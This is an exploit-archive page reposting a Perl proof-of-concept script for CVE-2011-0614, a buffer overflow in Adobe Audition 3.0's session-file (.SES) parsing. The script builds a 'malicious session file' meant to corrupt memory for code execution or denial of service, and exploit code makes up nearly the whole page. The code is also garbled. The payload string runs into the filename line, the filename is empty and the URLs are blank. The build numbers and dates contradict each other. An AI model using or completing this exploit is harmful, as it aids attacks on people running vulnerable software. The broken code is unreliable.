Adobe Audition 3.0 build 7283 – Session File Handling Buffer Overflow (PoC)

  • 作者: LiquidWorm
    日期: 2011-05-13
  • 类别:
  • 来源:
  • #!/usr/bin/perl
    # Adobe Audition 3.0 (build 7283) Session File Handling Buffer Overflow PoC
    # Vendor: Adobe Systems Inc.
    # Product web page:
    # Affected version: 3.0 (build 7238)
    # Summary: Recording, mixing, editing, and mastering — Adobe® Audition® 3 software is the
    # all-in-one toolset for professional audio production.
    # Desc: Adobe Audition suffers from a buffer overflow vulnerability when dealing with .SES
    # (session) format file. The application failz to sanitize the user input resulting in a
    # memory corruption, overwriting several memory registers which can aid the atacker to gain
    # the power of executing arbitrary code or denial of service.
    # Tested on Microsoft Windows XP Professional SP3 (English)
    # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    # liquidworm gmail com
    # Zero Science Lab -
    # Zero Science Lab Advisory ID: ZSL-2011-5012
    # Zero Science Lab Advisory URL:
    # Adobe Advisory ID: APSB11-10
    # Adobe Advisory URL:
    # CVE ID: CVE-2011-0614
    # 18.09.2009
    $data = "\x43\x4F\x4F\x4C\x4E\x45\x53\x53\x50\xF2\x08\x00".
    $FNAME = "";
    print "\n\n[*] Creating malicious session file: $FNAME ...\r\n";
    open(ses, ">./$FNAME") || die "\n\aCannot open $FNAME: $!";
    print ses "$data";
    close (ses);
    print "\n[*] Malicious session file successfully crafted!\r\n\n";